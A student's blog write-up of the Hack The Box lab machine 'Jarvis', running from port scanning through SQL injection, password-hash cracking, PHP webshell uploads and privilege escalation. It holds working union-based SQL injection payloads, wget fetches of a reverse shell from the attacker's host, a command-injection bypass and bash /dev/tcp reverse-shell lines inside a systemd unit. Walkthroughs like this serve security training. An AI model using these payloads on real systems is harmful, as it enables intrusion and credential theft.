This page looks best with JavaScript enabled

Hackthebox - Jarvis

 ·  ☕ 11 min read  ·  👤 Hong
Hackthebox - Jarvis

Enumeration

1
2
3
4
5
6

nmap -p- -vv 10.10.10.143 -oN jarvis_allports.txt

PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack ttl 63
80/tcp    open  http    syn-ack ttl 63
64999/tcp open  unknown syn-ack ttl 63

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

nmap -sV -sC -vv -p 22,80,64999 10.10.10.143 -oN jarvis_specific.txt

PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzv4ZGiO8sDRbIsdZhchg+dZEot3z8++mrp9m0VjP6qxr70SwkE0VGu+GkH7vGapJQLMvjTLjyHojU/AcEm9MWTRWdpIrsUirgawwROic6HmdK2e0bVUZa8fNJIoyY1vPa4uNJRKZ+FNoT8qdl9kvG1NGdBl1+zoFbR9az0sgcNZJ1lZzZNnr7zv/Jghd/ZWjeiiVykomVRfSUCZe5qZ/aV6uVmBQ/mdqpXyxPIl1pG642C5j5K84su8CyoiSf0WJ2Vj8GLiKU3EXQzluQ8QJJPJTjj028yuLjDLrtugoFn43O6+IolMZZvGU9Man5Iy5OEWBay9Tn0UDSdjbSPi1X
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCDW2OapO3Dq1CHlnKtWhDucQdl2yQNJA79qP0TDmZBR967hxE9ESMegRuGfQYq0brLSR8Xi6f3O8XL+3bbWbGQ=
|   256 77:d4:ae:1f:b0:be:15:1f:f8💿c8:15:3a:c3:69:e1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPuKufVSUgOG304mZjkK8IrZcAGMm76Rfmq2by7C0Nmo
80/tcp    open  http    syn-ack ttl 63 Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
64999/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Directory Enumeration

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

gobuster dir --url http://10.10.10.143// -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt

/images               (Status: 301) [Size: 313] [--> http://10.10.10.143/images/]
/index.php            (Status: 200) [Size: 23628]                                
/nav.php              (Status: 200) [Size: 1333]                                 
/footer.php           (Status: 200) [Size: 2237]                                 
/css                  (Status: 301) [Size: 310] [--> http://10.10.10.143/css/]   
/js                   (Status: 301) [Size: 309] [--> http://10.10.10.143/js/]    
/fonts                (Status: 301) [Size: 312] [--> http://10.10.10.143/fonts/] 
/phpmyadmin           (Status: 301) [Size: 317] [--> http://10.10.10.143/phpmyadmin/]
/connection.php       (Status: 200) [Size: 0]                                        
/room.php             (Status: 302) [Size: 3024] [--> index.php]                     
/sass                 (Status: 301) [Size: 311] [--> http://10.10.10.143/sass/]      
/server-status        (Status: 403) [Size: 300]

1

wfuzz -u http://10.10.10.143/room.php\?cod\=1FUZZ -w /usr/share/wordlists/seclists/Fuzzing/special-chars.txt

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                      
=====================================================================

000000001:   200        189 L    443 W      5916 Ch     "~"                                                                          
000000003:   200        189 L    443 W      5916 Ch     "@"                                                                          
000000030:   200        189 L    443 W      5916 Ch     """                                                                          
000000029:   200        189 L    443 W      5916 Ch     "'"                                                                          
000000007:   200        189 L    443 W      5916 Ch     "^"                                                                          
000000015:   200        189 L    443 W      5916 Ch     "="                                                                          
000000031:   200        189 L    443 W      5916 Ch     "<"                                                                          
000000032:   200        189 L    443 W      5916 Ch     ">"                                                                          
000000014:   200        190 L    466 W      6204 Ch     "+"                                                                          
000000028:   200        189 L    443 W      5916 Ch     ":"                                                                          
000000024:   200        190 L    466 W      6204 Ch     "."                                                                          
000000023:   200        189 L    443 W      5916 Ch     ","                                                                          
000000022:   200        189 L    443 W      5916 Ch     "`"                                                                          
000000019:   200        189 L    443 W      5916 Ch     "["                                                                          
000000018:   200        189 L    443 W      5916 Ch     "]"                                                                          
000000027:   200        190 L    466 W      6204 Ch     ";"                                                                          
000000026:   200        189 L    443 W      5916 Ch     "?"                                                                          
000000025:   200        189 L    443 W      5916 Ch     "/"                                                                          
000000021:   200        189 L    443 W      5916 Ch     "\"                                                                          
000000020:   200        189 L    443 W      5916 Ch     "|"                                                                          
000000008:   200        190 L    466 W      6204 Ch     "&"                                                                          
000000017:   200        189 L    443 W      5916 Ch     "}"                                                                          
000000016:   200        189 L    443 W      5916 Ch     "{"                                                                          
000000006:   200        189 L    443 W      5916 Ch     "%"                                                                          
000000012:   200        189 L    443 W      5916 Ch     "-"                                                                          
000000013:   200        189 L    443 W      5916 Ch     "_"                                                                          
000000011:   200        189 L    443 W      5916 Ch     ")"                                                                          
000000010:   200        189 L    443 W      5916 Ch     "("                                                                          
000000009:   200        189 L    443 W      5916 Ch     "*"                                                                          
000000002:   200        189 L    443 W      5916 Ch     "!"                                                                          
000000004:   200        190 L    466 W      6204 Ch     "#"                                                                          
000000005:   200        189 L    443 W      5916 Ch     "$"

WFUZZ used to find not linked directories, servlets, parameters for checking different kind of injections (SQL, XSS, LDAP, etc)

1
2
3

weird-characters.txt
---
+, ., ;, &, #

Exploitation

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

?cod=10 union select 1,2,"hello World",4,5,6,7
?cod=10 union select 1,2,(select @@version),4,5,6,7
?cod=10 union select 1,2,(select schema_name from information_schema.schemata limit 1 ),4,5,6,7

?cod=-1 union select 1,2,3,4,5,6,7
?cod=-1 union select 1,2,database(),4,5,6,7 # hotel
?cod=-1 union select 1,2,version(),4,5,6,7 # 10.1.37-MariaDB-0+deb9u1
?cod=-1 union select 1,2,user(),4,5,6,7 # DBadmin@localhost
?cod=-1 union select 1,2,load_file("/etc/passwd"),4,5,6,7 # Shows the content of /etc/passwd
?cod=-1 union select 1,2,schema_name,4,5,6,7 from information_schema.schemata # List database names 
?cod=-1 union select 1,2,schema_name,4,5,6,7 from information_schema.schemata limit 0,1 # Limits the output to 1, lists hotel db
?cod=-1 union select 1,2,schema_name,4,5,6,7 from information_schema.schemata limit 1,1 # displays information_schema db
?cod=-1 union select 1,2,schema_name,4,5,6,7 from information_schema.schemata limit 2,1 # displays mysql db
?cod=-1 union select 1,2,schema_name,4,5,6,7 from information_schema.schemata limit 3,1 # displays performance_schema db
?cod=-1 union select 1,2,table_name,4,5,6,7 from information_schema.tables where table_schema="hotel" limit 0,1 # room table. list tables from hotel database
?cod=-1 union select 1,2,column_name,4,5,6,7 from information_schema.columns where table_schema="hotel" limit 0,1 # column cod in room table
?cod=-1 union select 1,2,column_name,4,5,6,7 from information_schema.columns where table_schema="hotel" limit 1,1 # column name in room table
?cod=-1 union select 1,2,column_name,4,5,6,7 from information_schema.columns where table_schema="hotel" limit 2,1 # column price in room table
?cod=-1 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema="hotel" # displays all the columns in the room table
?cod=10 union select 1,2,group_concat(table_name,column_name),4,5,6,7 from information_schema.columns where table_schema="hotel"
?cod=10 union select 1,2,group_concat(table_name,column_name),4,5,6,7 from information_schema.columns where table_schema="mysql"
?cod=10 union select 1,2,group_concat(host,user,password ),4,5,6,7 from mysql.user # will find the hash for mysql 
?cod=10 union select 1,2,group_concat(user),4,5,6,7 from mysql.user # Found user for mysql
?cod=100 union select 1,2,group_concat(host,user, password),4,5,6,7 from mysql.user # Get the password hash

Bash script to also automate the name column for the room table or can use the group_concat()

1

for i in $(seq 0 15); do echo "[+] for $i: $(curl -s -X GET "http://10.10.10.143/room.php\?cod\=-1%20union%20select%201,2,column_name,4,5,6,7%20from%20information_schema.columns%20where%20table_schema\=%22hotel%22%20limit%20$1,1" | grep "price-room"  | html2text)"; done


1

localhostDBadmin*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

hash-identifier "2D2B7A5E4E637B8FBA1D17F40318F277D29964D0"

#########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

1
2

echo "2D2B7A5E4E637B8FBA1D17F40318F277D29964D0" | wc -m
	41

According to hashcat is the mode 300

Used hashcat on my Windows machine

1

.\hashcat.exe -m 300 .\jarvis_hash.txt .\rockyou.txt


1

2d2b7a5e4e637b8fba1d17f40318f277d29964d0:imissyou
  • Found user for the password hash
1
2

?cod=10 union select 1,2,group_concat(user),4,5,6,7 from mysql.user
	DBadmin

Potential creds for phpmyadmin → DBadmin : imissyouPotential creds for phpmyadmin → DBadmin : imissyou

LOAD_FILE feature in for sqli to read files

1

?cod=100 union select 1,2,load_file("/etc/passwd"),4,5,6,7

Can also read the php source cood from the machine

1

?cod=100 union select 1,2,load_file("/var/www/html/room.php"),4,5,6,7

First method to get remote code execution

Remote code execution on phpmyadmin 4.8.0: https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/

1

http://10.10.10.143/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_lhblk2nhn0chl0k4ql5at5dt0jbor9o1

  • Get the php-reverse shell and edit the file
  • host the file to be transfered to the targeted machine python -m SimpleHTTPServer
  • Start netcat listener
  • Login into /phpmyadmin
    SQL → SELECT '<?php exec("wget -O /var/www/html/rev.php <http://10.10.14.25:8000/rev.php>"); ?>'
1

10.10.10.143/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_6d0mgp6pkovuhgapifeku11udb4r49ng

Interactive shell

1
2
3
4
5
6
7
8
9

python -c 'import pty; pty.spawn("/bin/bash")'

CTRL + Z 

stty raw -echo
fg
[Press Enter]

export TERM=screen

Second method to get remote code execution

1

?cod=100 union select 1,2,'<?php phpinfo(); ?>',4,5,6,7 INTO OUTFILE '/var/www/html/myinfo.php'

Going into the file we outfile into /myinfo.php to test possible rce

  • Host the reverse-php with python server
  • Start netcat listener
1

/room.php?cod=100 union select 1,2,'<?php exec("wget http://10.10.14.25:8000/reverse.php"); ?>',4,5,6,7 INTO OUTFILE '/var/www/html/reverse.php'
  • To execute the code simply go into /reverse.php

Privilege Escalation

Privilege Escalation to user pepper

1
2
3
4
5
6
7

www-data@jarvis:/bin$ sudo -l
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py


  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150

simplery.py
---
#!/usr/bin/env python3
from datetime import datetime
import sys
import os
from os import listdir
import re

def show_help():
    message='''
********************************************************
* Simpler   -   A simple simplifier ;)                 *
* Version 1.0                                          *
********************************************************
Usage:  python3 simpler.py [options]

Options:
    -h/--help   : This help
    -s          : Statistics
    -l          : List the attackers IP
    -p          : ping an attacker IP
    '''
    print(message)

def show_header():
    print('''***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************
''')

def show_statistics():
    path = '/home/pepper/Web/Logs/'
    print('Statistics\n-----------')
    listed_files = listdir(path)
    count = len(listed_files)
    print('Number of Attackers: ' + str(count))
    level_1 = 0
    dat = datetime(1, 1, 1)
    ip_list = []
    reks = []
    ip = ''
    req = ''
    rek = ''
    for i in listed_files:
        f = open(path + i, 'r')
        lines = f.readlines()
        level2, rek = get_max_level(lines)
        fecha, requ = date_to_num(lines)
        ip = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if fecha > dat:
            dat = fecha
            req = requ
            ip2 = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if int(level2) > int(level_1):
            level_1 = level2
            ip_list = [ip]
            reks=[rek]
        elif int(level2) == int(level_1):
            ip_list.append(ip)
            reks.append(rek)
        f.close()
	
    print('Most Risky:')
    if len(ip_list) > 1:
        print('More than 1 ip found')
    cont = 0
    for i in ip_list:
        print('    ' + i + ' - Attack Level : ' + level_1 + ' Request: ' + reks[cont])
        cont = cont + 1
	
    print('Most Recent: ' + ip2 + ' --> ' + str(dat) + ' ' + req)
	
def list_ip():
    print('Attackers\n-----------')
    path = '/home/pepper/Web/Logs/'
    listed_files = listdir(path)
    for i in listed_files:
        f = open(path + i,'r')
        lines = f.readlines()
        level,req = get_max_level(lines)
        print(i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3] + ' - Attack Level : ' + level)
        f.close()

def date_to_num(lines):
    dat = datetime(1,1,1)
    ip = ''
    req=''
    for i in lines:
        if 'Level' in i:
            fecha=(i.split(' ')[6] + ' ' + i.split(' ')[7]).split('\n')[0]
            regex = '(\d+)-(.*)-(\d+)(.*)'
            logEx=re.match(regex, fecha).groups()
            mes = to_dict(logEx[1])
            fecha = logEx[0] + '-' + mes + '-' + logEx[2] + ' ' + logEx[3]
            fecha = datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')
            if fecha > dat:
                dat = fecha
                req = i.split(' ')[8] + ' ' + i.split(' ')[9] + ' ' + i.split(' ')[10]
    return dat, req
			
def to_dict(name):
    month_dict = {'Jan':'01','Feb':'02','Mar':'03','Apr':'04', 'May':'05', 'Jun':'06','Jul':'07','Aug':'08','Sep':'09','Oct':'10','Nov':'11','Dec':'12'}
    return month_dict[name]
	
def get_max_level(lines):
    level=0
    for j in lines:
        if 'Level' in j:
            if int(j.split(' ')[4]) > int(level):
                level = j.split(' ')[4]
                req=j.split(' ')[8] + ' ' + j.split(' ')[9] + ' ' + j.split(' ')[10]
    return level, req
	
def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

if __name__ == '__main__':
    show_header()
    if len(sys.argv) != 2:
        show_help()
        exit()
    if sys.argv[1] == '-h' or sys.argv[1] == '--help':
        show_help()
        exit()
    elif sys.argv[1] == '-s':
        show_statistics()
        exit()
    elif sys.argv[1] == '-l':
        list_ip()
        exit()
    elif sys.argv[1] == '-p':
        exec_ping()
        exit()
    else:
        show_help()
        exit()
  • Make a reverse shell file in /tmp directory
  • We will use the -p flag from the script
1
2
3
4
5
6
7
8

cd /tmp

echo "bash -i >& /dev/tcp/10.10.14.25/4321 0>&1" > rev.sh

cd /var/www/Admin-Utilities
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

 Enter an IP: $(bash /tmp/rev.sh)

systemctl SUID Priv Esc

1
2
3
4
5
6
7
8

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TFas

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

nano root.service
---
[Unit]
Description=test

[Service]
Type=oneshot
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.25/8080 0>&1'

[Install]
WantedBy=multi-user.target

1
2
3
4
5
6
7

nc -lvnp 5555

/bin/systemctl enable /home/pepper/root.service
	Removed /etc/systemd/system/multi-user.target.wants/root.service.
	Created symlink /etc/systemd/system/multi-user.target.wants/root.service -> /home/pepper/root.service.

/bin/systemctl start root.service

/room.php?cod=100 union select 1,2,'<?php exec("wget -O /var/www/html/test.php http://10.10.14.25:8000/reverse.php"); ?>',4,5,6,7

Skills Learned

  • File writes through SQL injection
  • Exploiting systemctl GTFObin
Hong Woo
WRITTEN BY
Hong
📚Cybersecurity Student🚩CTF Player☁️Cloud Computing

See Also

©2023, All Rights Reserved